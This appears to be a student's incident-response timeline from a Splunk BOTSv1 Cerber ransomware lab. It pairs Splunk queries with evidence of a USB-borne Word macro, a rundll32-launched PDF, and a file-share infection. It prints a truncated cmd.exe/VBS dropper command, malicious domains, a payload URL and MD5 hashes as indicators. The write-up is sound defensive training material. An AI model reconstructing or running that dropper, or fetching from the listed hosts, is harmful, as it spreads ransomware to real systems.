實作

2016-08-24 16:42:17 接上USB
we8105desk
data="MIRANDA_PRI"

index="botsv1" sourcetype=winregistry friendlyname

2016-08-24 16:43:12 開啟Word啟動惡意程式
we8105desk
user WAYNECORPINC\bob.smith

ParentCommandLine
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n /f "D:\Miranda_Tate_unveiled.dotm"

CommandLine
cmd.exe /V /C set "GSI=%APPDATA%%RANDOM%.vbs" && (for %i in...

MD5 15E52F52ED2B8ED122FAE897119687C4

index="botsv1" sourcetype="xmlwineventlog:microsoft-windows-sysmon/operational" *.vbs

2016-08-24 16:48:12
solidaritedeproximite.org

2016-08-24 16:48:13
solidaritedeproximite.org /mhtr.jpg

2016-08-24 16:49:24 Suricata偵測A Network Trojan was detected
192.168.250.100 > 85.93.0.0
ETPRO TROJAN Ransomware/Cerber Checkin 2

2016-08-24 16:49:25 Suricata偵測A Network Trojan was detected
192.168.250.100 > 85.93.4.54
ETPRO TROJAN Ransomware/Cerber Checkin Error ICMP Response

2016-08-24 16:49:36 Suricata偵測A Network Trojan was detected
192.168.250.100 > 85.93.43.236
ETPRO TROJAN Ransomware/Cerber Checkin Error ICMP Response

2016-08-24 16:56:47 執行惡意PDF程式
we8105desk
user WAYNECORPINC\bob.smith

ParentCommandLine
C:\Windows\Explorer.EXE

CommandLine
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL D:\Work Stuff\013\013366.pdf

MD5 DD81D91FF3B0763C392422865C9AC12E

index=botsv1 host="we8105desk" sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" CommandLine="D:\"
| table _time, CommandLine
| reverse

2016-08-24 17:15:12
cerberhhyed5frqa.xmfir0.win

2016-08-24 17:15:12 Suricata偵測連線到Ransomware Cerber Domain
192.168.250.100 > 192.168.250.20
ETPRO TROJAN Ransomware/Cerber Checkin 2

index="botsv1" "Cerber" sourcetype=suricata signature="ETPRO TROJAN Ransomware*"

2016-08-24 17:15:18 Fileshare
192.168.250.100 > 192.168.250.20
registry_path
HKU\s-1-5-21-67332772-3493699611-3403467266-1109\software\microsoft\windows\currentversion\explorer\mountpoints2##192.168.250.20#fileshare

index=botsv1 host="we8105desk" sourcetype=WinRegistry fileshare
| head 1

REF

https://www.aldeid.com/wiki/TryHackMe-BP-Splunk/Ransomware##2_-_What_is_the_name_of_the_USB_key_inserted_by_Bob_Smith?